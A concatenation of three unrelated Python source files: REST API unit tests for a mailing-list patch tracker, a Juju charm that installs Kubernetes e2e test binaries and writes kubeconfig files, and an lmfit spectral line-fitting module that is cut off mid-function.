self.assertIn("foo=bar", resp["Location"])
def test_project_config_get(self):
self.p.config = {"git": {"push_to": "/tmp/aaa"}}
self.p.save()
resp = self.api_client.get(self.PROJECT_BASE + "config/")
self.assertEquals(resp.status_code, 401)
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.get(self.PROJECT_BASE + "config/")
self.assertEquals(resp.status_code, 200)
self.assertEquals(resp.data["git"]["push_to"], "/tmp/aaa")
def test_project_config_put(self):
new_config = {"git": {"push_to": "/tmp/bbb"}}
resp = self.api_client.put(
self.PROJECT_BASE + "config/", new_config, format="json"
)
self.assertEquals(resp.status_code, 401)
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.put(
self.PROJECT_BASE + "config/", new_config, format="json"
)
self.assertEquals(resp.status_code, 200)
self.assertEquals(resp.data["git"]["push_to"], "/tmp/bbb")
resp = self.api_client.get(self.PROJECT_BASE + "config/")
self.assertEquals(resp.status_code, 200)
self.assertEquals(resp.data["git"]["push_to"], "/tmp/bbb")
def test_update_project_head(self):
resp = self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
self.api_client.login(username=self.user, password=self.password)
resp_before = self.api_client.get(
self.PROJECT_BASE + "series/" + "20160628014747.20971-1-famz@redhat.com/"
)
data = {
"message_ids": ["20160628014747.20971-1-famz@redhat.com"],
"old_head": "None",
"new_head": "000000",
}
resp = self.api_client.post(
self.PROJECT_BASE + "update_project_head/",
data=json.dumps(data),
content_type="application/json",
)
resp_after = self.api_client.get(
self.PROJECT_BASE + "series/" + "20160628014747.20971-1-famz@redhat.com/"
)
self.assertEquals(resp_before.data["is_merged"], False)
self.assertEquals(resp.status_code, 200)
self.assertEquals(resp.data["count"], 1)
self.assertEquals(resp.data["new_head"], "000000")
self.assertEquals(resp_after.data["is_merged"], True)
def test_project_post_no_login(self):
data = {"name": "keycodemapdb"}
resp = self.api_client.post(self.REST_BASE + "projects/", data=data)
self.assertEquals(resp.status_code, 401)
def test_project_post_minimal(self):
data = {"name": "keycodemapdb"}
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(self.REST_BASE + "projects/", data=data)
self.assertEquals(resp.status_code, 201)
self.assertEquals(
resp.data["resource_uri"].startswith(self.REST_BASE + "projects/"), True
)
self.assertEquals(resp.data["name"], data["name"])
resp = self.api_client.get(resp.data["resource_uri"])
self.assertEquals(resp.data["name"], data["name"])
def test_project_post(self):
self.api_client.login(username=self.user, password=self.password)
data = {
"name": "keycodemapdb",
"mailing_list": "qemu-devel@nongnu.org",
"prefix_tags": "keycodemapdb",
"url": "https://gitlab.com/keycodemap/keycodemapdb/",
"git": "https://gitlab.com/keycodemap/keycodemapdb/",
"description": "keycodemapdb generates code to translate key codes",
"display_order": 4321,
"parent_project": self.PROJECT_BASE,
}
resp = self.api_client.post(self.REST_BASE + "projects/", data=data)
self.assertEquals(resp.status_code, 201)
self.assertEquals(
resp.data["resource_uri"].startswith(self.REST_BASE + "projects/"), True
)
self.assertEquals(resp.data["name"], data["name"])
self.assertEquals(resp.data["mailing_list"], data["mailing_list"])
self.assertEquals(resp.data["prefix_tags"], data["prefix_tags"])
self.assertEquals(resp.data["url"], data["url"])
self.assertEquals(resp.data["git"], data["git"])
self.assertEquals(resp.data["description"], data["description"])
self.assertEquals(resp.data["display_order"], data["display_order"])
self.assertEquals(resp.data["logo"], None)
self.assertEquals(resp.data["parent_project"], self.PROJECT_BASE)
resp = self.api_client.get(resp.data["resource_uri"])
self.assertEquals(resp.data["name"], data["name"])
self.assertEquals(resp.data["mailing_list"], data["mailing_list"])
self.assertEquals(resp.data["prefix_tags"], data["prefix_tags"])
self.assertEquals(resp.data["url"], data["url"])
self.assertEquals(resp.data["git"], data["git"])
self.assertEquals(resp.data["description"], data["description"])
self.assertEquals(resp.data["display_order"], data["display_order"])
self.assertEquals(resp.data["logo"], None)
self.assertEquals(resp.data["parent_project"], self.PROJECT_BASE)
def test_project_results_list(self):
resp1 = self.api_client.get(self.PROJECT_BASE)
resp = self.api_client.get(resp1.data["results"])
self.assertEqual(resp.data["count"], len(resp.data["results"]))
def test_series_single(self):
resp = self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
self.assertEqual(
resp.data["subject"],
"[Qemu-devel] [PATCH] quorum: Only compile when supported",
)
self.assertEqual(
resp.data["stripped_subject"], "quorum: Only compile when supported"
)
self.assertEqual(resp.data["is_complete"], True)
self.assertEqual(resp.data["total_patches"], 1)
self.assertEqual(len(resp.data["replies"]), 0)
self.assertEqual(len(resp.data["patches"]), 1)
self.assertEqual(resp.data["patches"][0]["subject"], resp.data["subject"])
self.assertEqual(
resp.data["patches"][0]["stripped_subject"], resp.data["stripped_subject"]
)
def test_series_multiple(self):
resp = self.apply_and_retrieve(
"0004-multiple-patch-reviewed.mbox.gz",
self.p.id,
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
self.assertEqual(
resp.data["subject"],
"[Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
self.assertEqual(
resp.data["stripped_subject"],
"Report format specific info for LUKS block driver",
)
self.assertEqual(resp.data["is_complete"], True)
self.assertEqual(resp.data["total_patches"], 2)
self.assertEqual(len(resp.data["replies"]), 2)
self.assertEqual(len(resp.data["patches"]), 2)
self.assertEqual(
resp.data["replies"][0]["resource_uri"],
self.PROJECT_BASE + "messages/5792265A.5070507@redhat.com/",
)
self.assertEqual(
resp.data["replies"][0]["in_reply_to"],
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
self.assertEqual(
resp.data["replies"][0]["subject"],
"Re: [Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
self.assertEqual(
resp.data["replies"][1]["resource_uri"],
self.PROJECT_BASE
+ "messages/e0858c00-ccb6-e533-ee3e-9ba84ca45a7b@redhat.com/",
)
self.assertEqual(
resp.data["replies"][1]["in_reply_to"],
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
self.assertEqual(
resp.data["replies"][1]["subject"],
"Re: [Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
self.assertEqual(
resp.data["patches"][0]["resource_uri"],
self.PROJECT_BASE
+ "messages/1469192015-16487-2-git-send-email-berrange@redhat.com/",
)
self.assertEqual(
resp.data["patches"][0]["subject"],
"[Qemu-devel] [PATCH v4 1/2] crypto: add support for querying parameters for block encryption",
)
self.assertEqual(
resp.data["patches"][0]["stripped_subject"],
"crypto: add support for querying parameters for block encryption",
)
self.assertEqual(
resp.data["patches"][1]["resource_uri"],
self.PROJECT_BASE
+ "messages/1469192015-16487-3-git-send-email-berrange@redhat.com/",
)
self.assertEqual(
resp.data["patches"][1]["subject"],
"[Qemu-devel] [PATCH v4 2/2] block: export LUKS specific data to qemu-img info",
)
self.assertEqual(
resp.data["patches"][1]["stripped_subject"],
"block: export LUKS specific data to qemu-img info",
)
def test_series_incomplete(self):
resp = self.apply_and_retrieve(
"0012-incomplete-series.mbox.gz",
self.p.id,
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
self.assertEqual(
resp.data["subject"],
"[Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
self.assertEqual(
resp.data["stripped_subject"],
"Report format specific info for LUKS block driver",
)
self.assertEqual(resp.data["is_complete"], False)
self.assertEqual(resp.data["total_patches"], 2)
self.assertEqual(len(resp.data["replies"]), 2)
self.assertEqual(len(resp.data["patches"]), 1)
self.assertEqual(
resp.data["patches"][0]["subject"],
"[Qemu-devel] [PATCH v4 1/2] crypto: add support for querying parameters for block encryption",
)
self.assertEqual(
resp.data["patches"][0]["stripped_subject"],
"crypto: add support for querying parameters for block encryption",
)
def test_series_list(self):
self.apply_and_retrieve(
"0004-multiple-patch-reviewed.mbox.gz",
self.p.id,
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
resp = self.api_client.get(self.REST_BASE + "series/")
self.assertEqual(resp.data["count"], 2)
resp = self.api_client.get(self.PROJECT_BASE + "series/")
self.assertEqual(resp.data["count"], 2)
resp = self.api_client.get(self.REST_BASE + "projects/12345/series/")
self.assertEqual(resp.status_code, 404)
def test_series_results_list(self):
resp1 = self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
resp = self.api_client.get(resp1.data["results"])
self.assertEqual(resp.data["count"], len(resp.data["results"]))
def test_series_search(self):
resp1 = self.apply_and_retrieve(
"0004-multiple-patch-reviewed.mbox.gz",
self.p.id,
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
resp2 = self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
resp = self.api_client.get(self.REST_BASE + "series/?q=quorum")
self.assertEqual(resp.data["count"], 1)
self.assertEqual(
resp.data["results"][0]["resource_uri"], resp2.data["resource_uri"]
)
self.assertEqual(resp.data["results"][0]["subject"], resp2.data["subject"])
self.assertEqual("replies" in resp.data["results"][0], False)
self.assertEqual("patches" in resp.data["results"][0], False)
resp = self.api_client.get(self.REST_BASE + "series/?q=project:QEMU")
self.assertEqual(resp.data["count"], 2)
self.assertEqual(
resp.data["results"][0]["resource_uri"], resp1.data["resource_uri"]
)
self.assertEqual(resp.data["results"][0]["subject"], resp1.data["subject"])
self.assertEqual("replies" in resp.data["results"][0], False)
self.assertEqual("patches" in resp.data["results"][0], False)
self.assertEqual(
resp.data["results"][1]["resource_uri"], resp2.data["resource_uri"]
)
self.assertEqual(resp.data["results"][1]["subject"], resp2.data["subject"])
self.assertEqual("replies" in resp.data["results"][1], False)
self.assertEqual("patches" in resp.data["results"][1], False)
resp = self.api_client.get(self.REST_BASE + "projects/12345/series/?q=quorum")
self.assertEqual(resp.status_code, 404)
resp = self.api_client.get(
self.REST_BASE + "projects/12345/series/?q=project:QEMU"
)
self.assertEqual(resp.status_code, 404)
def test_series_delete(self):
test_message_id = "1469192015-16487-1-git-send-email-berrange@redhat.com"
series = self.apply_and_retrieve(
"0004-multiple-patch-reviewed.mbox.gz", self.p.id, test_message_id
)
message = series.data["message"]
resp_before = self.api_client.get(
self.REST_BASE
+ "projects/"
+ str(self.p.id)
+ "/series/"
+ test_message_id
+ "/"
)
resp_reply_before = self.api_client.get(message + "replies/")
resp_without_login = self.api_client.delete(
self.REST_BASE
+ "projects/"
+ str(self.p.id)
+ "/series/"
+ test_message_id
+ "/"
)
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.delete(
self.REST_BASE
+ "projects/"
+ str(self.p.id)
+ "/series/"
+ test_message_id
+ "/"
)
self.api_client.logout()
resp_after = self.api_client.get(
self.REST_BASE
+ "projects/"
+ str(self.p.id)
+ "/series/"
+ test_message_id
+ "/"
)
resp_reply_after = self.api_client.get(message + "replies/")
self.assertEqual(resp_before.status_code, 200)
self.assertEqual(resp_reply_before.status_code, 200)
self.assertEqual(resp_without_login.status_code, 401)
self.assertEqual(resp.status_code, 204)
self.assertEqual(resp_after.status_code, 404)
self.assertEqual(resp_reply_after.status_code, 404)
def test_create_message(self):
dp = self.get_data_path("0022-another-simple-patch.json.gz")
with open(dp, "r") as f:
data = f.read()
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(
self.PROJECT_BASE + "messages/", data, content_type="application/json"
)
self.assertEqual(resp.status_code, 201)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20171023201055.21973-11-andrew.smirnov@gmail.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(
resp.data["subject"],
"[Qemu-devel] [PATCH v2 10/27] imx_fec: Reserve full 4K "
"page for the register file",
)
def test_patch_message(self):
the_tags = ["Reviewed-by: Paolo Bonzini <pbonzini@redhat.com"]
dp = self.get_data_path("0022-another-simple-patch.json.gz")
with open(dp, "r") as f:
data = f.read()
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(
self.PROJECT_BASE + "messages/", data, content_type="application/json"
)
self.assertEqual(resp.status_code, 201)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20171023201055.21973-11-andrew.smirnov@gmail.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(resp_get.data["tags"], [])
resp = self.api_client.patch(
self.PROJECT_BASE
+ "messages/20171023201055.21973-11-andrew.smirnov@gmail.com/",
{"tags": the_tags},
)
self.assertEqual(resp.status_code, 200)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20171023201055.21973-11-andrew.smirnov@gmail.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(resp_get.data["tags"], the_tags)
def test_create_text_message(self):
dp = self.get_data_path("0004-multiple-patch-reviewed.mbox.gz")
with open(dp, "r") as f:
data = f.read()
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(
self.PROJECT_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 201)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/1469192015-16487-1-git-send-email-berrange@redhat.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(
resp.data["subject"],
"[Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
def test_patch_series(self):
dp = self.get_data_path("0001-simple-patch.mbox.gz")
with open(dp, "r") as f:
data = f.read()
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(
self.PROJECT_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 201)
resp = self.api_client.patch(
self.PROJECT_BASE + "series/20160628014747.20971-1-famz@redhat.com/",
{"is_tested": True},
)
self.assertEqual(resp.status_code, 200)
resp_get = self.api_client.get(
self.PROJECT_BASE + "series/20160628014747.20971-1-famz@redhat.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertTrue(resp_get.data["is_tested"])
def test_create_message_without_project_pk(self):
dp = self.get_data_path("0024-multiple-project-patch.json.gz")
with open(dp, "r") as f:
data = f.read()
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(
self.REST_BASE + "messages/", data, content_type="application/json"
)
self.assertEqual(resp.status_code, 201)
self.assertEqual(resp.data["count"], 2)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(
resp_get.data["subject"],
"[Qemu-devel] [PATCH 1/7] SecurityPkg/Tcg2Pei: drop Tcg2PhysicalPresenceLib dependency",
)
resp_get2 = self.api_client.get(
self.PROJECT_BASE_2
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get2.status_code, 200)
def test_create_text_message_without_project_pk(self):
dp = self.get_data_path("0023-multiple-project-patch.mbox.gz")
with open(dp, "r") as f:
data = f.read()
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(
self.REST_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 201)
self.assertEqual(resp.data["count"], 2)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(
resp_get.data["subject"],
"[Qemu-devel] [PATCH 1/7] SecurityPkg/Tcg2Pei: drop Tcg2PhysicalPresenceLib dependency",
)
resp_get2 = self.api_client.get(
self.PROJECT_BASE_2
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get2.status_code, 200)
def test_without_login_create_message(self):
dp = self.get_data_path("0022-another-simple-patch.json.gz")
with open(dp, "r") as f:
data = f.read()
resp = self.api_client.post(
self.PROJECT_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 401)
def test_non_maintainer_create_message(self):
self.create_user(username="test", password="userpass")
self.api_client.login(username="test", password="userpass")
dp = self.get_data_path("0023-multiple-project-patch.mbox.gz")
with open(dp, "r") as f:
data = f.read()
resp = self.api_client.post(
self.REST_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 201)
self.assertEqual(resp.data["count"], 0)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get.status_code, 404)
resp_get2 = self.api_client.get(
self.PROJECT_BASE_2
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get2.status_code, 404)
def test_maintainer_create_message(self):
test = self.create_user(username="test", password="userpass")
self.api_client.login(username="test", password="userpass")
self.p.maintainers = (test,)
dp = self.get_data_path("0023-multiple-project-patch.mbox.gz")
with open(dp, "r") as f:
data = f.read()
resp = self.api_client.post(
self.REST_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 201)
self.assertEqual(resp.data["count"], 1)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get.status_code, 200)
resp_get2 = self.api_client.get(
self.PROJECT_BASE_2
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get2.status_code, 404)
def test_importer_create_message(self):
dp = self.get_data_path("0023-multiple-project-patch.mbox.gz")
with open(dp, "r") as f:
data = f.read()
self.create_user(username="test", password="userpass", groups=["importers"])
self.api_client.login(username="test", password="userpass")
resp = self.api_client.post(
self.REST_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 201)
self.assertEqual(resp.data["count"], 2)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(
resp_get.data["subject"],
"[Qemu-devel] [PATCH 1/7] SecurityPkg/Tcg2Pei: drop Tcg2PhysicalPresenceLib dependency",
)
resp_get2 = self.api_client.get(
self.PROJECT_BASE_2
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get2.status_code, 200)
def test_message(self):
series = self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
message = series.data["patches"][0]["resource_uri"]
resp = self.api_client.get(message)
self.assertEqual(resp.data["mbox"], Message.objects.all()[0].get_mbox())
def test_message_mbox(self):
series = self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
message = series.data["patches"][0]["resource_uri"]
resp = self.client.get(message + "mbox/")
self.assertEqual(resp.data, Message.objects.all()[0].get_mbox())
def test_address_serializer(self):
data1 = {"name": "Shubham", "address": "shubhamjain7495@gmail.com"}
serializer1 = AddressSerializer(data=data1)
valid1 = serializer1.is_valid()
valid_data1 = serializer1.validated_data
data2 = {"name": 123, "address": "shubhamjain7495@gmail.com"}
serializer2 = AddressSerializer(data=data2)
valid2 = serializer2.is_valid()
valid_data2 = serializer2.validated_data
self.assertEqual(valid1, True)
self.assertEqual(
valid_data1,
OrderedDict(
[("name", "Shubham"), ("address", "shubhamjain7495@gmail.com")]
),
)
self.assertEqual(valid2, True)
self.assertEqual(
valid_data2,
OrderedDict([("name", "123"), ("address", "shubhamjain7495@gmail.com")]),
)
def test_message_replies(self):
series = self.apply_and_retrieve(
"0004-multiple-patch-reviewed.mbox.gz",
self.p.id,
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
message = series.data["message"]
resp = self.api_client.get(message + "replies/")
self.assertEqual(resp.data["count"], 4)
self.assertEqual(
resp.data["results"][0]["resource_uri"],
self.PROJECT_BASE
+ "messages/1469192015-16487-2-git-send-email-berrange@redhat.com/",
)
self.assertEqual(
resp.data["results"][0]["subject"],
"[Qemu-devel] [PATCH v4 1/2] crypto: add support for querying parameters for block encryption",
)
self.assertEqual(
resp.data["results"][1]["resource_uri"],
self.PROJECT_BASE
+ "messages/1469192015-16487-3-git-send-email-berrange@redhat.com/",
)
self.assertEqual(
resp.data["results"][1]["subject"],
"[Qemu-devel] [PATCH v4 2/2] block: export LUKS specific data to qemu-img info",
)
self.assertEqual(
resp.data["results"][2]["resource_uri"],
self.PROJECT_BASE + "messages/5792265A.5070507@redhat.com/",
)
self.assertEqual(
resp.data["results"][2]["subject"],
"Re: [Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
self.assertEqual(
resp.data["results"][3]["resource_uri"],
self.PROJECT_BASE
+ "messages/e0858c00-ccb6-e533-ee3e-9ba84ca45a7b@redhat.com/",
)
self.assertEqual(
resp.data["results"][3]["subject"],
"Re: [Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
def test_schema(self):
resp = self.api_client.get(self.REST_BASE + "schema/")
self.assertEqual(resp.status_code, 200)
if __name__ == "__main__":
main() | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from charms import layer
from charms.reactive import hook
from charms.reactive import is_state
from charms.reactive import remove_state
from charms.reactive import set_state
from charms.reactive import when
from charms.reactive import when_not
from charmhelpers.core import hookenv
from shlex import split
from subprocess import call
from subprocess import check_call
from subprocess import check_output
@hook('upgrade-charm')
def reset_delivery_states():
''' Remove the state set when resources are unpacked. '''
remove_state('kubernetes-e2e.installed')
@when('kubernetes-e2e.installed')
def messaging():
''' Probe our relations to determine the propper messaging to the
end user '''
missing_services = []
if not is_state('kubernetes-master.available'):
missing_services.append('kubernetes-master')
if not is_state('certificates.available'):
missing_services.append('certificates')
if missing_services:
if len(missing_services) > 1:
subject = 'relations'
else:
subject = 'relation'
services = ','.join(missing_services)
message = 'Missing {0}: {1}'.format(subject, services)
hookenv.status_set('blocked', message)
return
hookenv.status_set('active', 'Ready to test.')
@when_not('kubernetes-e2e.installed')
def install_kubernetes_e2e():
''' Deliver the e2e and kubectl components from the binary resource stream
packages declared in the charm '''
charm_dir = os.getenv('CHARM_DIR')
arch = determine_arch()
# Get the resource via resource_get
resource = 'e2e_{}'.format(arch)
try:
archive = hookenv.resource_get(resource)
except Exception:
message = 'Error fetching the {} resource.'.format(resource)
hookenv.log(message)
hookenv.status_set('blocked', message)
return
if not archive:
hookenv.log('Missing {} resource.'.format(resource))
hookenv.status_set('blocked', 'Missing {} resource.'.format(resource))
return
# Handle null resource publication, we check if filesize < 1mb
filesize = os.stat(archive).st_size
if filesize < 1000000:
hookenv.status_set('blocked',
'Incomplete {} resource.'.format(resource))
return
hookenv.status_set('maintenance',
'Unpacking {} resource.'.format(resource))
unpack_path = '{}/files/kubernetes'.format(charm_dir)
os.makedirs(unpack_path, exist_ok=True)
cmd = ['tar', 'xfvz', archive, '-C', unpack_path]
hookenv.log(cmd)
check_call(cmd)
services = ['e2e.test', 'ginkgo', 'kubectl']
for service in services:
unpacked = '{}/{}'.format(unpack_path, service)
app_path = '/usr/local/bin/{}'.format(service)
install = ['install', '-v', unpacked, app_path]
call(install)
set_state('kubernetes-e2e.installed')
@when('tls_client.ca.saved', 'tls_client.client.certificate.saved',
'tls_client.client.key.saved', 'kubernetes-master.available',
'kubernetes-e2e.installed')
@when_not('kubeconfig.ready')
def prepare_kubeconfig_certificates(master):
''' Prepare the data to feed to create the kubeconfig file. '''
layer_options = layer.options('tls-client')
# Get all the paths to the tls information required for kubeconfig.
ca = layer_options.get('ca_certificate_path')
key = layer_options.get('client_key_path')
cert = layer_options.get('client_certificate_path')
servers = get_kube_api_servers(master)
# pedantry
kubeconfig_path = '/home/ubuntu/.kube/config'
# Create kubernetes configuration in the default location for ubuntu.
create_kubeconfig('/root/.kube/config', servers[0], ca, key, cert,
user='root')
create_kubeconfig(kubeconfig_path, servers[0], ca, key, cert,
user='ubuntu')
# Set permissions on the ubuntu users kubeconfig to ensure a consistent UX
cmd = ['chown', 'ubuntu:ubuntu', kubeconfig_path]
check_call(cmd)
set_state('kubeconfig.ready')
@when('kubernetes-e2e.installed', 'kubeconfig.ready')
def set_app_version():
''' Declare the application version to juju '''
cmd = ['kubectl', 'version', '--client']
from subprocess import CalledProcessError
try:
version = check_output(cmd).decode('utf-8')
except CalledProcessError:
message = "Missing kubeconfig causes errors. Skipping version set."
hookenv.log(message)
return
git_version = version.split('GitVersion:"v')[-1]
version_from = git_version.split('",')[0]
hookenv.application_version_set(version_from.rstrip())
def create_kubeconfig(kubeconfig, server, ca, key, certificate, user='ubuntu',
context='juju-context', cluster='juju-cluster'):
'''Create a configuration for Kubernetes based on path using the supplied
arguments for values of the Kubernetes server, CA, key, certificate, user
context and cluster.'''
# Create the config file with the address of the master server.
cmd = 'kubectl config --kubeconfig={0} set-cluster {1} ' \
'--server={2} --certificate-authority={3} --embed-certs=true'
check_call(split(cmd.format(kubeconfig, cluster, server, ca)))
# Create the credentials using the client flags.
cmd = 'kubectl config --kubeconfig={0} set-credentials {1} ' \
'--client-key={2} --client-certificate={3} --embed-certs=true'
check_call(split(cmd.format(kubeconfig, user, key, certificate)))
# Create a default context with the cluster.
cmd = 'kubectl config --kubeconfig={0} set-context {1} ' \
'--cluster={2} --user={3}'
check_call(split(cmd.format(kubeconfig, context, cluster, user)))
# Make the config use this new context.
cmd = 'kubectl config --kubeconfig={0} use-context {1}'
check_call(split(cmd.format(kubeconfig, context)))
def get_kube_api_servers(master):
'''Return the kubernetes api server address and port for this
relationship.'''
hosts = []
# Iterate over every service from the relation object.
for service in master.services():
for unit in service['hosts']:
hosts.append('https://{0}:{1}'.format(unit['hostname'],
unit['port']))
return hosts
def determine_arch():
''' dpkg wrapper to surface the architecture we are tied to'''
cmd = ['dpkg', '--print-architecture']
output = check_output(cmd).decode('utf-8')
return output.rstrip() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 4 10:35:23 2015
@author: Anton O Lindhal
"""
import numpy as np
import lmfit
from . progress import update_progress
_2pi = 2 * np.pi
_gauss_fwhm_factor = 2 * np.sqrt(2 * np.log(2))
def gaussian(x, amplitude, center, sigma):
return amplitude * np.exp(-(x-center)**2 / (2 * sigma**2))
def lorentzian(x, amplitude, center, sigma):
return amplitude / _2pi * sigma / ((x - center)**2 + sigma**2 / 4)
def skewed_gauss_for_500_eV_start_params(x, y, eps=None, bg=False):
x0 = x[np.nanargmax(y)]
n_lines = 1
if x0 < 15:
n_lines += 1
# if x0 < 11.5:
# n_lines += 1
params = lmfit.Parameters()
if bg == True:
params.add('bg_factor', 1, min=0, max=3, vary=True)
params.add('amplitude_1', 7000, min=4000, max=15000)
params.add('center_1', x0, min=x0*0.9, max=x0*1.1)
params.add('sigma_1', 0.0001, min=0)
params.add('gamma_1', 0.4, min=0)
params.add('skew_1', 0.0, vary=True)
if 1< n_lines:
x2 = x0 * 1.6
params.add('amplitude_2', 3000, min=0, max=4000)
params.add('center_2', x2, min=x2*0.9, max=x2*1.1)
params.add('sigma_2', 0.1, min=0, max=1)
# params.add('gamma_2', 0.1, min=0)
params.add('skew_2', 0.0, vary=False)
return params
def skewed_gauss_for_500_eV(params, x, y=None, eps=None, bg=None):
if bg is not None:
mod = bg.copy()
else:
mod = np.zeros_like(x)
if 'bg_factor' in params:
mod *= params['bg_factor'].value
i = 1
while 'center_{}'.format(i) in params:
amplitude = params['amplitude_{}'.format(i)].value
center = params['center_{}'.format(i)].value
sigma = params['sigma_{}'.format(i)].value
if 'gamma_{}'.format(i) in params:
gamma = params['gamma_{}'.format(i)].value
else:
gamma = None
skew = params['skew_{}'.format(i)].value
mod += lmfit.models.skewed_voigt(x, amplitude, center,
sigma, gamma, skew)
# mod += lmfit.models.skewed_gaussian(x, amplitude, center,
# sigma, skew)
i += 1
if y is None:
return mod
if eps is None:
return mod-y
return (mod-y)/eps
def start_params(x=None, y=None, params_in=None, n_lines=2, verbose=False,
line_type=None):
params = lmfit.Parameters()
params.add('amplitude_1', 20, min=0)
params.add('center_1', value=15)
params.add('sigma_1', value=0.4, min=0)
if line_type == 'voigt':
pass
# params.add('gamma_1', value=0.4e-3, min=0)
# params['sigma_1'].value *= 1e-3
# params.add('skew_1', value=0)
if n_lines > 1:
params.add('amp_ratio', value=1, min=0)
params.add('amplitude_2', expr='amplitude_1 * amp_ratio')
params.add('center_diff', value=1, min=0.5)
params.add('center_2', expr='center_1 + center_diff')
params.add('sigma_2', value=0.4, min=0)
if line_type == 'voigt':
pass
# params.add('gamma_2', value=0.4e-3, min=0)
# params['sigma_2'].value *= 1e-3
# params.add('skew_2', value=0)
for i_line in range(3, n_lines+1):
params.add('amplitude_{}'.format(i_line), 20, min=0)
params.add('center_{}'.format(i_line), value=11)
params.add('sigma_{}'.format(i_line), value=0.5, min=0)
if line_type == 'voigt':
pass
# params.add('gamma_{}'.format(i_line), value=0.5, min=0)
# params['sigma_{}'.format(i_line)].value *= 1e-7
# params.add('skew_{}'.format(i_line), value=0)
# if n_lines > 2:
# print('Warning: Only one or two lines implemented in start_params().',
# print('Using two lines.'
if (x is not None) and (y is not None):
max_idx = np.argmax(y)
y_max = y[max_idx]
if verbose:
print('y_max =', y_max)
params['amplitude_1'].value = y_max
params['center_1'].value = x[max_idx]
if n_lines > 2:
for i in range(max_idx):
